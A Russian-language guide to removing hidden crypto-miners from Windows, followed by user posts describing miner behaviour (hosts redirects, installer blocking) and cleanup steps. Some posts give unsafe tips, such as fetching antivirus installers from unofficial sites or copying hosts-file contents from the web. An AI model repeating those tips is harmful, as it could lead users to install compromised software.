Как удалить вирус-майнер в Windows 11
Если у вас возникли подозрения, что компьютер заражен вирусом-майнером, в первую очередь стоит в этом действительно убедиться, используя доступные средства сканирование и различные инструменты от сторонних разработчиков. Это нужно не только для того, чтобы определить активность самого вируса, но и чтобы узнать его происхождение, что поможет при дальнейшем удалении. Все необходимые инструкции по этой теме вы найдете в статье по ссылке ниже. Они должны помочь разобраться с правильным тестированием компьютера и поиском майнера. После определения уже можно переходить к следующим шагам, связанным с очисткой компьютера от угроз.
Удаление вирусов-майнеров
Далее мы предлагаем вашему вниманию набор последовательных шагов, которые предназначены для завершения подозрительных процессов, поиска вирусов и их полной очистки. В промежуточных этапах понадобится выполнять некоторые действия вручную, деинсталлируя вредоносные программы и восстанавливая используемые браузеры, чтобы CPU или GPU-майнеры не работали и в них под видом скриптов или в незаметном режиме, внедряясь под видом полезных расширений или других инструментов. Мы бы не рекомендовали пропускать какие-то шаги, но вы можете менять используемые инструменты по своему усмотрению, если знаете более удобные для себя альтернативы предложенным.
Шаг 1: Блокировка вредоносных процессов через RKill
RKill — консольная утилита со своими специальными настройками, предназначенная для сканирования активных процессов и завершения подозрительных. Ее преимущество перед ручным поиском заключается в первую очередь в скорости действия, а во вторую — в умении обойти ограничения, установленные вирусами для учетных записей пользователей. Следуйте инструкции, чтобы использовать RKill для остановки связанных с майнером процессов.
-
Откройте официальную страницу RKill по ссылке выше и выберите подходящий для себя метод скачивания.
Шаг 2: Удаление подозрительных программ
После действия рассмотренного выше инструмента ни один из вредоносных процессов больше не запущен в ОС, соответственно, конфликтов при деинсталляции программ и отдельном удалении файлов возникнуть не должно. Теперь вы можете приступить к одному из шагов, который полностью выполняется вручную. Заключается он в удалении подозрительных программ, которые ранее вы определили как возможные источники майнеров.
- Самый простой вариант заключается в использовании классического меню управления приложениями. Для этого вызовите «Пуск» и перейдите в «Параметры», кликнув по значку с изображением шестеренки.
- На панели слева выберите раздел «Приложения» и откройте категорию «Приложения и возможности».
- Найдите подозрительную программу по ее названию, нажмите справа кнопку с тремя точками и из меню выберите пункт «Удалить».
- Подтвердите деинсталляцию и ожидайте окончания этого процесса.
Если в результате появились ошибки или некоторые файлы, связанные с программой, до сих пор остаются на компьютере, возможно, для них включена специальная защита, не позволяющая обычному пользователю выполнять какие-либо действия. В этом случае придется обращаться к дополнительным инструментам, предназначенным для очистки неудаляемых файлов. Более детально об этом читайте в другой статье на нашем сайте, перейдя по ссылке ниже.
Шаг 3: Восстановление стандартных настроек браузеров
Сейчас известно много случаев, когда майнеры самой разной сложности и скрытности встраиваются в браузер и используют ресурсы компьютера для добычи криптовалюты во время стандартного серфинга. Это могут быть различные незаметные скрипты или вручную установленные расширения. В любом случае, самым действенным методом борьбы с такими угрозами является восстановление стандартных настроек браузера или его переустановка. Конечно, проще вернуть стандартные настройки, поэтому рекомендуем ознакомиться со вспомогательным материалом по этой теме ниже.
Шаг 4: Сканирование на наличие угроз через MalwareBytes
MalwareBytes — один из известных антивирусов от сторонних разработчиков, который предоставляет для личного использования бесплатную премиум-версию сроком на 14 дней. Мы рекомендуем этот софт для выполнения основного сканирования, поскольку его базы вирусов отлично настроены на все типы угроз и позволят избавиться от преимущественного большинства из них за одно сканирование.
- На официальном сайте нужно выбрать вариант «Бесплатная загрузка», чтобы получить ту самую премиум-версию на две недели.
- После запуска установщика выберите удобное место на ПК для инсталляции антивируса или оставьте параметры по умолчанию.
- При первом запуске появится приветственное окно, в котором следует кликнуть по «Приступайте к…».
- Вам будет дополнительно предложено приобрести премиум, но на данном этапе это не нужно, поэтому просто щелкните по «Не сейчас».
- В главном окне программы нажмите кнопку «Проверка» в блоке «Средство проверки». Это стандартное сканирование, затрагивающее все файлы на компьютере.
- Теперь вам нужно подождать, пока средство проверки проанализирует память, реестр и файловую систему. В среднем процесс занимает до получаса, но зависит от объема информации, хранящейся на вашем компьютере.
- По завершении на экране появятся результаты в виде списка угроз, их типа и расположения. Мы советуем помещать в карантин их все, даже если файл помечен просто как потенциально подозрительный.
- Далее в главном окне перейдите к карантину, точно так же выделите эти все угрозы и удалите их с компьютера. На этом первый этап очистки завершен, но нам еще понадобится помощь других программ.
Шаг 5: Сканирование на наличие рекламы через AdwCleaner
Следующий этап подразумевает сканирование при помощи еще одной программы под названием AdwCleaner. Если предыдущие решения были нацелены на борьбу со всеми типами угроз, то данное больше подходит для удаления рекламных вирусов, в которых тоже могут находиться майнеры, работая в браузере в фоновом режиме. AdwCleaner не требует установки и довольно быстро осуществляет проверку, поэтому обязательно рекомендуем ее для использования.
- На главной странице сайта выберите вариант «Бесплатная загрузка», чтобы получить нужную версию программы в ее портативном варианте.
- По завершении загрузки запустите полученный исполняемый файл и примите условия соглашения.
- Нажмите кнопку «Запустить проверку», начиная тем самым выявление рекламного ПО и потенциально нежелательных программ.
- Как уже было сказано выше, сканирование через AdwCleaner не займет много времени, но во время него постарайтесь не выполнять других действий на ПК, чтобы не замедлять его и не препятствовать проверке.
- По завершении выделите найденные угрозы галочками и отправьте их в карантин.
- Примите уведомление о том, что все соответствующие процессы будут завершены.
- Далее перейдите в раздел «Карантин».
- В нем точно так же выделите все найденные угрозы и подтвердите их удаление.
Шаг 6: Завершающее сканирование через ESET Online Scanner
Существует еще много разных антивирусных программ, но многие из них, позиционирующиеся как классические антивирусы, имеют схожие базы данных с угрозами, и использование параллельно нескольких из них не имеет особого смысла. Поэтому в качестве последнего этапа мы хотели бы обратить внимание на ESET Online Scanner. Преимущество этого ПО заключается в более глубоком сканировании с применением облачных баз данных для обнаружения вирусов самых разных типов. В сообществе эта программа хорошо зарекомендовала себя как средство выявления скрытых майнеров. Тоже не требует установки, распространяется бесплатно и проста в использовании.
- После скачивания программы с официального сайта запустите ее и нажмите кнопку «Начало работы», чтобы перейти непосредственно к списку доступных инструментов.
- Подтвердите условия использования, нажав кнопку «Я принимаю».
- Понадобится пройти еще несколько подготовительных этапов, выбрав, хотите ли вы делиться информацией пользовательского опыта.
- Как только вы попадете в главное меню, можете нажать кнопку «Полное сканирование», чтобы запустить полноценную проверку ОС на наличие вирусов.
- Еще ESET Online Scanner может обнаружить потенциально нежелательные приложения, поэтому, если считаете их опасными, разрешите их поиск и помещение в карантин, после чего запустите сканирование.
- Начнется процесс запуска модулей и подготовки к сканированию. Как показывает опыт, ESET Online Scanner дольше остальных антивирусов обрабатывает файлы, поэтому запаситесь терпением и ожидайте окончания этого процесса.
- По завершении вы получите информацию об устраненных угрозах с их помещением в карантин. Если какие-то файлы можно только удалить, это понадобится подтвердить вручную.
После выполнения всех этапов из данной статьи вы должны полностью избавиться от майнеров любого типа, действующих в Windows 11. Дальше вам остается только осторожно пользоваться компьютером и соблюдать правила безопасности. Важно не скачивать подозрительный софт, максимально ограничить использование торрент-трекеров и пиратского софта. Общие рекомендации по выбору защиты и пользованию ПК вы найдете в другом нашем материале по ссылке ниже.
Как удалить скрытый майнер
Шутки шутками, но недавно столкнулся с такой ситуацией, когда после перезагрузки мой далеко не слабый комп вдруг в простое начал шуметь, температура процессора сразу поднялась до 70 градусов, как при игре. Открываю диспетчер задач, нагрузка резко падает, и всё становится как обычно. После закрытия диспетчера задач вдруг опять вентиляторы начинают шуметь, процесс начинает греться, открываю диспетчер задач, история повторяется. Если открыть Диспетчер задач и быстро отсортировать по нагрузке на процессор, то становится видно, что систему грузит программа MicrosoftHost.exe, которая находится в папке C:\ProgramData\WindowsTask\. Сразу первым делом пытаюсь зайти на сайт Dr.Web, чтобы скачать CureIt, но при переходе на сайт, меня вдруг перекидывает на страницу 8.8.8.8 вроде, или что-то такое было. Ну после этого я сразу понял, что подцепил какой-то вирус, если погуглить по названию процесса, то пишут, что это скрытый майнер, что объясняет почему там грузит систему одна программа. Притом, если скачать CureIt с телефона и запустить на компе, то CureIt находит вирус и удаляет, как будто бы. Но после перезагрузки всё остаётся также.
Решил написать, как почистить данный вирус, если знать что делать, то времени занимает немного, но поначалу я часа полтора сидел, пока всё почистил. Но некоторые моменты сделаны довольно хитро, если не очень хорошо ориентируешься в компах, то фиг почистишь этот вирус.
В общем для того, чтобы эту бяку полностью вычистить надо проделать следующие шаги.
Сразу говорю, я точно уже не помню, как назывались процессы и т.д., и это действия только для того типа скрытого майнера, который я поймал, у других могут отличаться. Но думаю сама последовательность действий может помочь.
1. Первым делом включаем отображение системных файлов, потому что папки с вирусом созданы как системные. И включаем отображение скрытых файлов. После всех действий можно обратно выключить. Нужно сделать как на скрине.
2. После этого открываем файл hosts, который находится в папке C:\Windows\System32\drivers\etc\. Там будет видно много строк наподобие такой
Не помню точно, на какой адрес было перенаправление, но в файле будет куча подобных строк, с адресами всех популярных антивирусов. Удаляем все эти строки, и сохраняем файл hosts. Редактировать надо в режиме администратора, иначе прав не хватит.
3. Теперь надо найти все процессы вируса. Было несколько папок с вирусом, которые лежали в папке C:\ProgramData\. Чтобы наверняка их найти, открываем Диспетчер задач, и включаем отображение столбца Командная строка, и ищем процессы, которые находятся в папке C:\ProgramData\. Например, помню был один вирус, который назывался Realtek HD, он был со значком динамика, т.е. маскировался под звуковые драйвера, но запущен он был не из папки C:\Windows\System32\, а из папки C:\ProgramData\.
Если нашли такой процесс, нажимаем правой кнопкой на процесс, далее Свойства, и открываем вкладку Цифровые подписи, у нормальных драйверов и процесс будут подписи, у вируса их не будет.
Находим все такие процесс, которые лежат в папках внутри C:\ProgramData\ и останавливаем их, иначе не получится удалить папку, пока программа внутри неё запущена.
4. Далее заходим в папку C:\ProgramData\. Там видим кучу системных папок, среди которых будут папки с именами известных антивирусов (думаю из-за этого CureIt и не мог ничего сделать, потому что не было прав на папку), и папки, в которых лежат процессы, которые мы остановили. Сделать с этими папками мы ничего не можем, т.к. при попытке открыть или что-то сделать, нам пишет, что нет прав, даже если у нас права администратора.
С каждой папкой нам необходимо сделать следующие действия:
Нажимаем правой кнопкой -> Свойства -> Безопасность -> Дополнительно.
В открывшемся окне мы видим, что у этой папки нет владельца. Нажимаем Изменить и указываем свою учетную запись владельцем.
И обязательно ставим галочку для дочерних объектов. После этого везде нажимаем ОК, чтобы сохранить. Теперь спокойно удаляем эту папку. Это нужно сделать со всеми папками с именами антивирусов и с процессами, которые мы ранее удалили. После этого надо в зайти в папки
C:\Program Files (x86)\
И точно также изменить владельца и удалить папки с именами антивирусов и различных программ от вирусов. Мне к 20 папке надоело проделывать все эти действия, поэтому можно сделать проще, через командную строку. Можно сразу в блокноте подготовить список всех папок и выполнить
takeown /F C:\ProgramData\Avira\ /R /D Y
takeown /F C:\ProgramData\DrWeb\ /R /D Y
5. Готово. После этого можно скачать тот же CureIt и всё проверить, также можно обратно скрыть системные файлы. И ещё этот майнер добавил свои папки в исключения Защитника Windows, на всякий случай надо тоже оттуда удалить эти папки.
1. Файл хост скрыт и его не открыть. Ищем его содержание в инете, вставляем в блокнот, сохраняем с названием host, и вставляем в папку etc с заменой.
2. Майнер блокирует запуск всех ехе, и не дает запуск антивируса? Скачиваем RogueKiller. Прога написанная на основе браузера инернетэкплорер. Запускается при ЛЮБЫХ запретах, и чистит их. После чего запускаем уже антивирус.
Такие пакости всегда лучше убирать, запускаясь с флешки, никаких танцев с бубнами и прятками не будет. У большинства топовых антивирусников есть загрузочный образ для флешки со всем необходимым.
Оо, у меня был точно такой же вирус! Изобретательный до жути.
Спасибо за шпаргалку, надеюсь, никому больше не пригодится 😅
Ответ на пост «Очередной обновление Windows 10 убивает подключение к сети»
С данной проблемой не сталкивался пока, возможно, что где-то всплывёт. Но хорошо, что уже понятно, где копать в случае чего. Тем более что не далее как позавчера был инцидент: с утра никто из пользователей не мог зайти на сетевые папки на 2012 сервере.
Обновление KB5028228 грохает авторизацию в домене, если контроллер домена работает на Самбе. После его установки клиенты не могут зайти на сетевые шары — ошибка "невозможно установить доверительные отношения станции с контроллером домена".
Про Винду 10, а также более новые сервера (2019) тоже что то похожее писали на Reddit, но там другое обновление так пакостит. Кажется KB5028166. Но если "домен на Самбе" вам ни о чём не говорит, то скорее всего вас эта проблема не коснётся. Либо это проблемы вашего админа.
Ответ на пост «Ответ на пост "Очередной обновление Windows 10 убивает подключение к сети"»
Не совсем в тему, но тоже об обновлениях. Есть у меня ноут Acer ES1-711 и это далеко не новая машинка, зато с огромным дисплеем 17.3″ и офигенной клавиатурой. С ним приключилась беда — умер жёсткий диск 🙁
Не такая уж и критичная проблема, было решено поставить SSD и сразу накатить 10-ку (раньше Windows 7 стояла). Однако столкнулся с проблемой — пропал тачпад, ну ,то-есть, вообще пропал и даже в диспетчере устройств его нет. Погуглив слегка, нашел, что решение просто офигенное, а именно нужно в BIOS режим тачпада переключить из advanced в basic. Вот только у меня и опции такой не было -_-.
Ну ок, обновил BIOS и все появилось. Тач тоже завелся)
Офигеть как меня впечатлило, что устройство просто может пропасть при обновлении, а решать нужно обновлением BIOS. Может это и норма, но с таким ранее не сталкивался
Ответ на пост «Очередной обновление Windows 10 убивает подключение к сети»
Пишу, потому что годный пост адски заминусили на ровном месте.
Позавчера обновился и сеть отвалилась. Сначала искал проблему в роутере, провайдере, проводе и тд. Перезагружался 10раз, переставлял драйвера сетевой, проводил сброс сети, ничего не помогло. Решил откатом системы до последнего обновления. А только что снова винда обновилась, и снова отвалилась сеть. Вот полез посмотреть номер обновления, забил в гугол и вот выпал этот заминусованнный пост.
Возможно проблема происходит только на определённом железе, но она есть. Вылечилось всё удалением галочки Network LightWeight Filter. Даже без перезагрузки. Надеюсь рецидивов не будет. Всём добра.
Ответ на пост «Очередной обновление Windows 10 убивает подключение к сети»
Для тех у кого с обновой вывалилось сетевое подключение, решение проблемы:
В свойствах подключения найти Network LightWeight Filter и снять с него галочку. Без рейтинга, просто чтобы сэкономить людям немного времени.
Ответ LbISS в «Скачиваем плейлист с Youtube без регистрации и смс»
Простите, но эти батники изврат в наши дни, при наличии нормального графического интерфейса для yt-dlp.
Для тех, кто не хочет собирать вручную, есть автоматический инсталлятор: https://github.com/kazukikasama/youtube-dlp-gui-installer. Вся его суть в том, что он скачивает в одну папку последние версии yt-dlp, ffmpeg, aria (менеджер быстрой загрузки) и собственно интерфейса, да создаёт ярлыки и анинсталлер.
Тут легко увидеть все варианты картинки и аудио, можно скачать их отдельно, или их автоматически склеит в готовое видео.
Обновления ютуба на данный интерфейс влияют точно так же, как и на yt-dlp — то есть, если качать перестало, надо зайти на https://github.com/yt-dlp/yt-dlp/releases/latest и скачать новую версию yt-dlp.exe и заменить файл в папке программы (по-умолчанию это %localappdata%\yt-dlp-gui)
Компьютерный мастер. Часть 270. Как изощрённо вирус с антивирусами боролся. примитивно, но эффективно.
Вчера был интересный случай, у клиента были жалобы на годовалый ноут на Ryzen-5 5300U, что он шумит громко и постоянно включается кулер даже с закрытой крышкой и меня вызвали заменить термопасту и почистить. но всё оказалось гораздо интереснее:
Я сразу заметил что windows 10 без антивируса и решил установить китайца Total 360, и первое с чем столкнулся, что не могу зайти на его сайт, ну думаю хз санкции давай через VPN попробую, через vpn скачал. но тут сюрприз антивирус просто не запускается, скачал касперского также через vpn и та же история. Скачать drweb cureit не возможно, через пару секунд после начала его загрузки любой браузер закрывался автоматически.
Я начал искать системные ошибки и неожиданно понял что сайт remontka.pro тоже не открывается. и тут я допер, что у нас в компе кто-то живет, причем очень хитрый майнер. при работе неожиданно начинают крутиться кулеры, но при попытке в диспетчере задач увидеть кто грузит систему там никого нет и вентилятор сразу успокаивается. т.е. вирус отслеживает наши действия в режиме онлайн.
Прикол как именно он запретил запуск установщиков антивирусов, он прописал запрет в реестре на запуск конкретных файлов:
А в файле HOSTS запрещенными оказалось более сотни сайтов, помогающие выявить вирус.
Причем даже после удаления ключей в реестре и файла хост, антивирусы начали скачиваться и запускаться, но отказывались устанавливаться, выдавая разнообразные ошибки. оказывается вирус применил ещё один хитрый трюк, он создал в C:\Program Files стандартные папки установки для всех антивирусов, сделал их только для чтения и скрыл пометив как системные. вот грязный извращенец)))
загрузка в безопасном режиме, чистка руками папок в C:\Program Files, подключение телефона в качестве usb модема и через него закачка CUREIT, антивирусная проверка, затем загрузка в обычном режиме еще один прогон CUREIT удаление вируса:
установка полноценного 360 Total Security, всем рекомендую кстати работает быстро ловит все известные вирусы не хуже касперского. Конечно передаёт все ваши данные товарищу СИ, но присмотр большого брата никому ещё не мешал)))
По итогам клиент доволен, ноут работает бесшумно, не греется и не просыпается с закрытой крышкой.
Rutracker и модераторы в доле с майнерами
На известном нам сайте с недавних пор пошли непонятные движения, и некоторые раздачи модераторы Намеренно игнорируют, несмотря на очевидные факты
Например раздача на программу Malwarebytes repack by Emir Cardan
169 / 8 на момент написания поста
После установки программы начинаются заметные тормоза системы и кулер набирает обороты улетая в космос.
Хорошо, сносим программу через панель управления, но эффекта ноль.
В диспетчере задач появляется несколько интересных процессов taskhos, taskhostw которые ведут в подпапку RealtekAudio, с которой нельзя просто так взаимодействовать через консоль cmd или в проводнике, она скрыта не обычным способом Windows, и просто так с ней ничего не сделать
Так вот , загрузка цп 100% в простое
При заходе в диспетчер стремительно падает, и при попытке открыть расположение вредных процессов закрывается диспетчер задач и окно папки появляется на долю секунды
При попытке установить антивирусники или спец софт для удаления подобной поеботы Майнер создаёт нам проблемы — закрытия, ошибки и т.д
Всплывают также разные процессы интересные связанные с вирус и один фейк svchost
Система дымит и лагает но
Модераторы сайта глубоко наплевать на вас, они видимо в доле или по братской любви разрешают таким раздачам висеть
Решается быстрой заморозкой всех связанных процессов в process hacker и успеть за 5 секунд открыть расположение фейкового taskhost процесса который откроет ProgramData/RealtekAudio
Windows покажет нам что тут пусто, это не так. Выделенные в process hacker процессы убиваем и сразу несём папку в корзину из «пути» и очищаем ее
После запускаем восстановление системы методами Windows или методом с cyberforum где есть много сообщений о подобном вирус
Эволюция как она есть
Порой так интересно наблюдать за эволюцией компьютерных вирусов. Вот так подхватишь какую-то дрянь, начинаешь разбираться и так увлекаешься этим делом, прямо чувствуешь себя Дроздовым. И ведь каждый раз найдешь что-то новенькое, уловки любой ценой защититься от всяких там юзверей.
Немного пояснения: в виду своей деятельности и лени пришлось раскурочать свою винду в решето. Понятно, что никаких антивирусов она и не видела никогда, да и тот же win defender отправлен в вечный сон реестром и гпо, открытая удаленка и вседоверяющий файервол. Никакой адекватной защиты в трёх словах.
Но и соответственно отлов вирусов, в частности майнеров, для меня не в новинку.
История: как-то заметил, что система стала виснуть на ровном месте. Лезем в диспетчер задач загрузка 100% и через секунду 10%. Классика.
Ну, думаю, приключение на 20 минут.
Лезу качать DrWeb cureit. Открываю сайт, браузер крашится. Ага. Знаем, проходили.
Лезем качать ProcessLasso. Любимый softportal, и тут нате переадресация на домен гугла.
Это дело тоже не в новинку: лезем искать файл hosts, и вот тут пошли интересности. А файла-то нету. Тут я списал на свою глупость, что вдруг где-то не там искал, все-равно к тому моменту cureit уже была скачана на ноут и перекинута на шару.
Ставим сканить систему, а параллельно находим ProcessLasso на другом сайте и начинаем выискивать процессы, которые как-то неадекватно кушают ресурсы. Таких оказалось несколько taskhost, который в диспетчере именовался COM Surrogate, audiodg и ещё парочка, которые позже cureit пачкой и почистил.
Что в этом оказалось интересного. При попытке открыть расположение файла происходил краш проводника и диспетчера задач, но во время фриза системы удалось углядеть путь до файла: C:/program data/realtek hd
Лезем туда напрямую, и. папки нет(видимость всех скрытых файлов папок включена). Не отчаиваемся, открываем консоль и пробуем искать оттуда. Все прекрасно видит, и даже позволяет залезть и полистать файлики.
По итогу cureit все почистил. И тут я вспомнил про hosts, полез туда же консолькой и о чудо, файлик-то на месте, открываем, удаляем тонну строк переадресации на 8.8.8.8, сохраняем, заменяем, радуемся жизни.
Позже узнал, что данный вирь сидит в новых репаках от "xatab'a". Что за люди. Ничего святого в них нет.
На этом я думал, что все и порешилось, пока на моих же глазах в систему удаленно не вошёл некий John — скрытая, как позже выяснилось, учетка с правами администратора. Но об этом уже в следующий раз, если кому-то будет это интересно.
Ответ на пост «Как удалить скрытый майнер»
1. Файл хост скрыт и его не открыть. Ищем его содержание в инете, вставляем в блокнот, сохраняем с названием host, и вставляем в папку etc с заменой.
2. Майнер блокирует запуск всех ехе, и не дает запуск антивируса? Скачиваем RogueKiller. Прога написанная на основе браузера инернетэкплорер. Запускается при ЛЮБЫХ запретах, и чистит их. После чего запускаем уже антивирус.
Никогда не было и вдруг опять!
— Вы компьютеры ремонтируете?
— У нас такая проблема: скачали обновление для программы «Очень нужная программа для бухгалтерии», а при установке антивирус ругался, мы два раза пробовали, потом антивирус отключили, программа обновилась, комп перезагрузился и теперь не включается. Вы поможете?
Как избавиться от вируса-майнера?
Проблема заключается в том, что где-то раз в плюс-минус 5 минут комп чуток подвисает — идёт 100% загрузка проца и, скорее всего, видюхи, судя по работе её кулера. Ну, и естественно, что эти тормоза не приносят ничего приятного в пользование компом.
Непосредственно перед этим скачком автоматически закрывается диспетчер задач, если он был до этого открыт.
Я пробовал гуглить проблему и вышел на киберфорум, где нашёлся топик со схожими симптомами. Там говорят, что это майнер и советуют скачать AVZ и в нём выполнить некий скрипт. Далее проблема стала за тем, что я просто не смог запустить AVZ, так как после открытия программы она тут же автоматически закрывается. В итоге я запустил её и выполнил скрипт из безопасного режима, однако это вообще ничего не дало.
Тогда я попробовал зарегиться на форуме и создать тему уже непосредственно по своему случаю, но сразу после авторизации браузеры стали автоматически закрываться 🙁
Также пробовал использовать ESET и Avast, но с ними та же беда, что с AVZ: я просто не могу их установить — они закрываются.
Винду переустанавливал месяц назад — это тоже не помогло. Встроенные в винду брандмауэр и защитник у меня если что включены, настройки параметров выдачи уведомлений о вносимых в ОС изменениях тоже включены и ничего не показывают. Кстати, что характерно, загрузка проца и подвисания не такие жёсткие, когда отсутствует доступ к инету.
В общем, я не знаю, что делать и надеюсь, что мне тут подскажут решение этой проблемы.
Кажись, нашёл гадёныша:
В папке C — ProgramData — RealtekHD находится файл taskhostw, который запускает периодически процесс taskhost с описанием COM surrogate!
При попытке зайти в папку место хранения файла папка тут же закрывается.
Гугл выдаёт, что это таки майнер (ситуация вообще 1 в 1 как у меня)
Как я чинил компьютер
Небольшой офис, чуток компов. Один из них начинает неадекватно себя вести. Нет прав на эксплорер, нет прав на диспетчер задач, глюки в ворде, тормозит, работать невозможно. Хозяйка компа говорит, что началось всё после тыкания в него флешкой. Ну, ок, вирус, думаю. Просканировал поверхность диска на всякий, качнул в сторонке лив сиди от каспера и запустил скан.
Тут приходит вторая мадам и говорит, что ей край нужно чота отправить в госорганы при помощи ЭЦП, которая на той самой флешке. Предупреждаю, что на ней, скорее всего, вирус, и тыкать ею в комп (ноут) нельзя. Но она говорит ,что сёдня — это крайний день для этого. Ну, ок, я предупредил..
Пока я гляжу на результаты сканирования, приходит эта вторая мадам и говорит могильным голосом, что у неё всё то же самое. Я про себя удовлетворённо подумал, что это хорошо, это, значит, точно вирус, а ей сказал встать в очередь. Между тем я понимаю, что сканирование затягивается и предлагаю разойтись. Все кто куда, а я домой с её ноутом подмышкой.
Дома я начинаю вникать в происходящее. Первым делом пытаюсь запустить сканирование ноута. Не выходит ничо. Каспер лив сиди пишет, что диск смонтирован только для чтения, и лечение будет невозможно, а дрвеб лив сиди при загрузке просит ввести логин и пасс при старте дебиана (на нём его лив сиди основан). Что за логин — неизвестно. Неудача.
Начинаю уже понемногу психовать. Думаю, выну диск, подрублю к своему компу и просканирую. Открываю крышку ноута — диска нет. Понимаю, что диск ССД М2. Нужно разбирать дальше. Разобрал дальше, воткнул таки себе, прогнал вебом, каспером. Нету вирусов.
Продолжаю психовать и начинаю нервничать.
Собрал всё взад, включаю. Всё по-прежнему. Обратил внимание, что в винде нет пункта «выключение», есть только «выход». Нажал. Логично появилось окно для авторизации и с полем для ввода пароля. Понимаю, что пароля не знаю. Выяснил, что его не было вовсе. Понимаю, что не понимаю, что делать.
Сварганил флешку с утилиткой Dism, прибиваю пасс, перезагружаюсь..
Нашёл в инете, как убрать пасс при помощи реестра и дистриба виндовс. Проделываю это вот всё, но на этапе net user мне cmd сообщает, что запрос отклонён, нет прав доступа.
Ладно. Стартую снова c dism, активирую задизабленную учётку Администратор. Перезагружаюсь. Выбираю Админа. Хоба! Просит ввести пароль.
Какой в ж0пу пароль? Ладно. Убираю пароль у админа. Перезагружаюсь. Снова не помогло. Пароль при загрузке чудом возвращается.
Понимаю, что это уже вызов, ибо подобного не встречал. Всякое было, от cabanas и до шифровальщиков, но тогда хотя бы знал, кто передо мной. Тут же гранды антивирусописательства говорят, что вируса-то нет. Но, тем не менее, кто-то при загрузке что-то делает..
Тут звонит владелица ноута и просит его вернуть. Хочет отдать его другому челу, а меня умоляет заняться тем, первым компом, ибо в пнд он позарез будет нужен. Он основной, там 1С и прочая требуха. Ну, ок. Отвёз ноут, стал долбиться с компом. Напомню, поведение у них идентичное.
Ради статистики решил загрузиться в безопасном режиме. Внезапно, но комп загрузился. Хм. Стал тупо перебирать всё, что запускается при старте. Стал отключать всякие обновления адобе, драйверы принтеров, службы, названия которых я не знаю ) Внезапно натыкаюсь, что служба сбора статистики (дословно не помню) Аваст отключаться не хочет. Пишет, что отказано в доступе. Немного поколебавшись, сношу Аваст. Перезагружаюсь. Вытаращив глаза, понимаю, что всё работает. Звоню товарищу, которому отдали ноут, прошу снести Аваст. И у него тоже всё заработало.
Вишенка на торте: Аваст у них был Про. Платный.
Итого угробил я на это всё полторы суток практически.
Как подозреваю, флешка была ни при чём, просто авасты обновились одновременно. А флешка — совпадение.
Потом я её пихал куда ни попадя и проверял всем подряд — никаких последствий.
Что это было со стороны Аваста — так и не понял. Но был немножечко в ..недоумении.
Такая вот история выходного дня.
Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть»
Для отслеживания подозрительных процессов очень удобен продвинутый менеджер процессов от самой майкрософт, называется ProcessExplorer.
Качается отсюда: https://docs.microsoft.com/en-us/sysinternals/downloads/proc. (сам сайт майкрософта, так что источник безопасен).
После запуска в меню выбираем эти два пункта:
И соглашаемся на условия конфиденциальности вирустотала.
Бинго, теперь у вас появится новая колонка в списке процессов, где отображается результат проверки на вирустотале, плюс проверка цифровой подписи запущенного файла. По нажатию на цифры сработки откроется страница вирустотала с отчётом.
ВАЖНО: сами файлы не передаются в вирустотал, он просто ищет там готовые результаты на файл с таким же хешем, так что особо мощный интернет не нужен! Если такого файла найденно не будет, то так и будет написано в данной колонке, и только по нажатию файл будет залит для проверки!
Так же, из полезных бонусов данной программы:
1) процессы отображаются в виде дерева, то есть вы видите, какими процессами они запущенны (на скрине показал кнопку активации данного режима)
2) можно вывести графики загрузки (память, проц, диск, видяха итд) для каждого процесса в таблице (правой кнопкой на название колонок, там выбрать пункты с «history» — это и есть графики)
3) Можно заменить этой программой встроенный менеджер процессов (для этого надо не просто открыть файл из архива, а сохранить его где-нибудь на компе)
4) продвинутые графики загрузки системы, открываются по нажатию на главный график сверху окна программы
Надеюсь, кому-то эта информация будет полезна. Сам использую данный инструмент уже лет 8, родной виндовый менеджер уже кажется убогим.
Ответ на пост «Вирус майнер nt kernel system и как с ним бороться. ( Когда открываю диспетчер задач фпс повышается )»
Эхх. где ты раньше был.
Тоже напоролся на этот вирус, пришлось долго мучаться, но всё же смог его удалить.
Если кому поможет, то боролся я с ним так: Пока искал инфу про этот вирус, напоролся на этот сайт: https://it-tehnik.ru/virus/virus-close-browser.html С него я скачал старую версию Касперского. Т.к. сайт не официальный, то вирус его не закрывал. Позже в самом Касперском я обновил его до актуальной версии и просто провёл сканирование и последующую очистку компа.
А теперь немного про сам вирус — это майнер, который весьма хорошо прячется. Как и многие другие вирусы, как только включаешь диспетчер задач, он перестаёт нагружать комп. Но он сам выключает диспетчер задач раз в минуту-две (точное время не засекал). Мой Windows Defender (винда не лицензионная) его практически не засекал. Всё что он находил — один файл, который после удаления он находил снова. и снова. и снова. Можно скачать другой антивирус, но при входе на официальный сайт он просто закрывал браузер. Казалось бы, можно скачать с другого сайта, либо с внешнего носителя, но и тут может выйти облом — этот вирус может не дать открыть некоторые антивирусы, либо не дать им провести проверку.
Может мой способ не самый лучший, но я всё равно хочу его опубликовать, мало ли кому поможет.
Типичный фейл
Было это когда вирус баннер прям поголовно был, ну убирать его не было сложно. Предлагал клиентам ставить касперского лицензию. Покупал оптом, ну и по одному продавал)).
Поставил очередному клиенту и заверил что с антивирусной защитой баннер он не словит. Проходит неделя, звонит, пыхтит, недовольный аж прям. Верните деньги, я опять баннер поймал. Мой вердикт, везите. Привозит значит системный блок. Баннер сперва убираю , а он рядом стоит, смотрит и тыкает меня, вот видите, видите, деньги верните.
Ну не может так быть что бы антивирус пропустил. Смотрю на значок Касперского а он серый (значит защита выключена, да не просто, а вручную). Тааак, спрашиваю, почему Касперский выключен, вы его отключали? Тык, мык, я не, да ну может быть. а он мне не давал на сайт 18+ зайти. Я говорю, на котором и впаймали баннер? Глаза опустил. Не мой косяк, с вас 500р. за удаления баннера. Занавес.
Kaspersky: Начало
Ответ на пост «Как я скрытый майнер искал»
Есть такая классная встроенная в винду штука — монитор ресурсов. Там есть первая вкладка «Обзор». Так вот, ее «классность» в том, что в отличии от диспетчера задач она продолжает показывать завершенные процессы, статус у них «Прерван». У меня эта штука постоянно открыта. Если слышу, что ноут загудел — смотрю в первую очередь в прерванные процессы. Там, как правило тусят виндовые «бекграунд таск» хост процессы, которые винда быстро прибивает как только видит активность пользователя. Как собсно майнеры и делают. 😉
Большинство антивирусов оказались подвержены атаке через символические ссылки
Исследователи из компании RACK911 Labs обратили внимание на то, что почти все антивирусные пакеты для Windows, Linux и macOS были уязвимы для атак, манипулирующих состоянием гонки (race conditions) во время удаления файлов, в которых обнаружено вредоносное ПО.
